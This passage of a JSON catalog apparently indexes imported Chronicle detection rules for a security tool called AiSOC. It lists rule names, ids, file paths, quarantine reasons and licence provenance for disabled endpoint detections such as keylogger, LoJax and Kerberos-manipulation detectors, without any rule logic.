"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-javascript-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_javascript_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_javascript_created.yaral" } }, { "id": "chronicle-detection-rules-info-file-javascript-executed", "type": "detection", "name": "info_file_javascript_executed", "description": "info_file_javascript_executed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-javascript-executed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_javascript_executed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_javascript_executed.yaral" } }, { "id": "chronicle-detection-rules-info-file-powershell-created", "type": "detection", "name": "info_file_powershell_created", "description": "info_file_powershell_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-powershell-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_powershell_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_powershell_created.yaral" } }, { "id": "chronicle-detection-rules-info-file-powershell-executed", "type": "detection", "name": "info_file_powershell_executed", "description": "info_file_powershell_executed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-powershell-executed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_powershell_executed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_powershell_executed.yaral" } }, { "id": "chronicle-detection-rules-info-file-read-by-full-path", "type": "detection", "name": "info_file_read_by_full_path", "description": "info_file_read_by_full_path", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-read-by-full-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_read_by_full_path", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_read_by_full_path.yaral" } }, { "id": "chronicle-detection-rules-info-file-vbscript-created", "type": "detection", "name": "info_file_vbscript_created", "description": "info_file_vbscript_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-vbscript-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_vbscript_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_vbscript_created.yaral" } }, { "id": "chronicle-detection-rules-info-file-vbscript-executed", "type": "detection", "name": "info_file_vbscript_executed", "description": "info_file_vbscript_executed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-vbscript-executed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_vbscript_executed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_vbscript_executed.yaral" } }, { "id": "chronicle-detection-rules-info-file-write-by-hash", "type": "detection", "name": "info_file_write_by_hash", "description": "info_file_write_by_hash", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-write-by-hash.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_write_by_hash", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_write_by_hash.yaral" } }, { "id": "chronicle-detection-rules-info-http-exact-url", "type": "detection", "name": "info_http_exact_url", "description": "info_http_exact_url", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-http-exact-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_http_exact_url", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/http_exact_url.yaral" } }, { "id": "chronicle-detection-rules-info-http-gate", "type": "detection", "name": "info_http_gate", "description": "info_http_gate", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-http-gate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_http_gate", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/http_gate.yaral" } }, { "id": "chronicle-detection-rules-info-http-user-agent", "type": "detection", "name": "info_http_user_agent", "description": "info_http_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-http-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_http_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/http_user_agent.yaral" } }, { "id": "chronicle-detection-rules-info-ip-address-resolution", "type": "detection", "name": "info_ip_address_resolution", "description": "info_ip_address_resolution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-ip-address-resolution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_ip_address_resolution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/ip_address_resolution.yaral" } }, { "id": "chronicle-detection-rules-info-usb-new-device", "type": "detection", "name": "info_usb_new_device", "description": "info_usb_new_device", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-usb-new-device.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_usb_new_device", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/usb_new_device.yaral" } }, { "id": "chronicle-detection-rules-info-wscript-copied-or-moved", "type": "detection", "name": "info_wscript_copied_or_moved", "description": "info_wscript_copied_or_moved", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-wscript-copied-or-moved.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_wscript_copied_or_moved", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/wscript_copied_or_moved.yaral" } }, { "id": "chronicle-detection-rules-info-wscript-executed", "type": "detection", "name": "info_wscript_executed", "description": "info_wscript_executed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-wscript-executed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_wscript_executed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/wscript_executed.yaral" } }, { "id": "chronicle-detection-rules-invocation-of-active-directory-diagnostic-tool-ntdsutilexe", "type": "detection", "name": "invocation_of_active_directory_diagnostic_tool_ntdsutilexe", "description": "invocation_of_active_directory_diagnostic_tool_ntdsutilexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/invocation-of-active-directory-diagnostic-tool-ntdsutilexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "invocation_of_active_directory_diagnostic_tool_ntdsutilexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/active_directory_security/process_creation/invocation_of_active_directory_diagnostic_tool__ntdsutil_exe.yaral" } }, { "id": "chronicle-detection-rules-ioc-domain-c2", "type": "detection", "name": "ioc_domain_C2", "description": "ioc_domain_C2", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ioc-domain-c2.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ioc_domain_C2", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/ioc_domain_C2.yaral" } }, { "id": "chronicle-detection-rules-ioc-domain-internal-policy", "type": "detection", "name": "ioc_domain_internal_policy", "description": "ioc_domain_internal_policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ioc-domain-internal-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ioc_domain_internal_policy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/ioc_domain_internal_policy.yaral" } }, { "id": "chronicle-detection-rules-ioc-hash-prevalence", "type": "detection", "name": "ioc_hash_prevalence", "description": "ioc_hash_prevalence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ioc-hash-prevalence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ioc_hash_prevalence", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/ioc_hash_prevalence.yaral" } }, { "id": "chronicle-detection-rules-ioc-ip-target", "type": "detection", "name": "ioc_ip_target", "description": "ioc_ip_target", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ioc-ip-target.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ioc_ip_target", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/ioc_ip_target.yaral" } }, { "id": "chronicle-detection-rules-ioc-sha256-hash", "type": "detection", "name": "ioc_sha256_hash", "description": "ioc_sha256_hash", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ioc-sha256-hash.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ioc_sha256_hash", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/ioc_sha256_hash.yaral" } }, { "id": "chronicle-detection-rules-ioc-sha256-hash-vt", "type": "detection", "name": "ioc_sha256_hash_vt", "description": "ioc_sha256_hash_vt", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ioc-sha256-hash-vt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ioc_sha256_hash_vt", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/ioc_sha256_hash_vt.yaral" } }, { "id": "chronicle-detection-rules-ip-target-prevalence", "type": "detection", "name": "ip_target_prevalence", "description": "ip_target_prevalence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ip-target-prevalence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ip_target_prevalence", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/ip_target_prevalence.yaral" } }, { "id": "chronicle-detection-rules-judgement-panda-exfil-activity", "type": "detection", "name": "judgement_panda_exfil_activity", "description": "judgement_panda_exfil_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/judgement-panda-exfil-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "judgement_panda_exfil_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/judgement_panda_exfil_activity.yaral" } }, { "id": "chronicle-detection-rules-kerberos-manipulation", "type": "detection", "name": "kerberos_manipulation", "description": "kerberos_manipulation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/kerberos-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "kerberos_manipulation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/kerberos_manipulation.yaral" } }, { "id": "chronicle-detection-rules-keylogger-detector-sysmon", "type": "detection", "name": "keylogger_detector_sysmon", "description": "keylogger_detector_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/keylogger-detector-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "keylogger_detector_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/keylogger_detector__sysmon.yaral" } }, { "id": "chronicle-detection-rules-kingminer-cryptojacker-sysmon", "type": "detection", "name": "kingminer_cryptojacker_sysmon", "description": "kingminer_cryptojacker_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/kingminer-cryptojacker-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "kingminer_cryptojacker_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/kingminer_cryptojacker__sysmon.yaral" } }, { "id": "chronicle-detection-rules-klist-purge", "type": "detection", "name": "klist_purge", "description": "klist_purge", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/klist-purge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "klist_purge", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/klist_purge.yaral" } }, { "id": "chronicle-detection-rules-kovter-malware-detector-sysmon-behavior", "type": "detection", "name": "kovter_malware_detector_sysmon_behavior", "description": "kovter_malware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/kovter-malware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "kovter_malware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/kovter_malware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-lazarus-attack-variant", "type": "detection", "name": "lazarus_attack_variant", "description": "lazarus_attack_variant", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lazarus-attack-variant.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lazarus_attack_variant", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/lazarus_attack_variant.yaral" } }, { "id": "chronicle-detection-rules-local-accounts-discovery", "type": "detection", "name": "local_accounts_discovery", "description": "local_accounts_discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/local-accounts-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "local_accounts_discovery", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/local_accounts_discovery.yaral" } }, { "id": "chronicle-detection-rules-loda-rat-detection", "type": "detection", "name": "loda_rat_detection", "description": "loda_rat_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/loda-rat-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "loda_rat_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/loda_rat_detection.yaral" } }, { "id": "chronicle-detection-rules-logins-from-terminated-employees", "type": "detection", "name": "logins_from_terminated_employees", "description": "logins_from_terminated_employees", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/logins-from-terminated-employees.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "logins_from_terminated_employees", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/authentication/logins_from_terminated_employees.yaral" } }, { "id": "chronicle-detection-rules-logon-scripts-userinitmprlogonscript", "type": "detection", "name": "logon_scripts_userinitmprlogonscript", "description": "logon_scripts_userinitmprlogonscript", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/logon-scripts-userinitmprlogonscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "logon_scripts_userinitmprlogonscript", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/logon_scripts__userinitmprlogonscript.yaral" } }, { "id": "chronicle-detection-rules-lojack-doubleagent-communication", "type": "detection", "name": "lojack_doubleagent_communication", "description": "lojack_doubleagent_communication", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lojack-doubleagent-communication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lojack_doubleagent_communication", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/lojack_double_agent_communication.yaral" } }, { "id": "chronicle-detection-rules-lojax-malware-proxyfirewall", "type": "detection", "name": "lojax_malware_proxyfirewall", "description": "lojax_malware_proxyfirewall", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lojax-malware-proxyfirewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "lojax_malware_proxyfirewall", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/lojax_malware__proxy_firewall.yaral" } }, { "id": "chronicle-detection-rules-lokibot-detector-windows10-sysmon-behavior", "type": "detection", "name": "lokibot_detector_windows10_sysmon_behavior", "description": "lokibot_detector_windows10_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/lokibot-detector-windows10-sysmon-behavior.yaml", 